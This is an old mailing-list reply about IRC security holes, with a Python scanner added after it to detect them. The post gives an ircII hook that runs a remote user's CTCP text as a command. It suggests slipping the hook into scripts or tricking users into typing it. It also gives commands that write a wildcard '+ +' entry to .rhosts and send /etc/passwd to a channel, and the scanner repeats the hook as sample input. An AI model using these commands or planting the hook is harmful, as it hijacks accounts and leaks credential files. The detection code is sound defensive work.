On Fri, 3 Feb 1995, Silicon Avatar wrote:

> On Fri, 3 Feb 1995, Lorna Leong wrote:
>
> > Hi,
> >
> > I read somewhere that there is a security loophole in IRC. I don't know
> > anything else about it but I would like to find out more information
> > about this. I heard that information about this IRC loophole can be found
> > by FTP at ftp.cert.org, but I couldn't find anything relevant there.
>
> If you are talking about the "jupe" or "grok" hole, it was temporary, and
> merely a hacked version of the client floating around at "trusted" sites.
>
> To my knowledge, these "hacks" have been removed and are no longer a threat
> (unless someone is propagating these older clients.)
>
> Simply put, you could "CTCP grok [command]" (CTCP being a method of
> communication over IRC) someone, and have that command executed,
> unknowingly, off the account.

No, IRC holes are a more serious threat than you give them credit for. For
example, if I were to add to a script (or better yet make someone type) the
following:

    /on ^ctcp "% % JUPE" $3-

They would be just as much in my control as if they were on a hacked client.
From this, you can do:

    /ctcp <nick> JUPE /exec echo + + >> $HOME/.rhosts

or

    /ctcp <nick> JUPE /red #<channel> /exec cat /etc/passwd

There's more to IRC backdoors than making people say stupid stuff on a
channel. I hope this example clears that up a little.

/dev/kmem
- This sig deleted for brevity -
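
A defender-side check for the two artifacts the message above describes, as an added example that is not part of the original post: it flags client script hooks whose body hands sender-supplied text to the command parser, and wildcard trust lines in a .rhosts file. The function names, the list of remote-triggered events, and the sample inputs are assumptions constructed for illustration; the matching is heuristic, not a full ircII script parser.

```python
import re

# "on" hook line: optional "/", modifier characters, event name, quoted pattern, body.
ON_HOOK = re.compile(
    r'^\s*/?on\s+[\^\-+]*(?P<event>\w+)\s+"(?P<pattern>[^"]*)"\s*(?P<body>.*)$',
    re.I)
# Body that begins with an argument expansion such as $3-, $* or $2.
ARG_AS_COMMAND = re.compile(r'^\{?\s*/?\s*\$(\*|\d+-?)')
# exec followed by an argument expansion in the same command.
EXEC_WITH_ARG = re.compile(r'\bexec\b[^;]*\$(\*|\d)', re.I)
# Events another user can trigger remotely (assumed list for this sketch).
REMOTE_EVENTS = {"ctcp", "msg", "public", "notice"}

def scan_script(text):
    """Return (line number, reason, line) for each suspicious hook."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = ON_HOOK.match(line)
        if not m or m.group("event").lower() not in REMOTE_EVENTS:
            continue
        body = m.group("body").strip()
        if ARG_AS_COMMAND.match(body):
            findings.append((lineno, "remote text run as a command", line.strip()))
        elif EXEC_WITH_ARG.search(body):
            findings.append((lineno, "remote text passed to exec", line.strip()))
    return findings

def scan_rhosts(text):
    """Return line numbers of .rhosts entries that use '+' as host or user."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if fields and not fields[0].startswith("#") and "+" in fields:
            hits.append(lineno)
    return hits

# Constructed sample inputs: the hook quoted in the post, two benign hooks,
# one exec variant, and a .rhosts file with a wildcard entry.
SAMPLE_SCRIPT = '''/on ^ctcp "% % JUPE" $3-
/on ^ctcp "% % VERSION" /notice $0 custom reply
on ^public "% % !run *" exec $3-
on ^msg "*" echo *$0* $1-
'''
SAMPLE_RHOSTS = "# constructed sample\ntrusted.example.org alice\n+ +\n"

if __name__ == "__main__":
    for lineno, reason, line in scan_script(SAMPLE_SCRIPT):
        print(f"script line {lineno}: {reason}: {line}")
    print("wildcard .rhosts lines:", scan_rhosts(SAMPLE_RHOSTS))
```

Run it over script files loaded at client startup and over each account's .rhosts; any hit on either side warrants a manual review of the file.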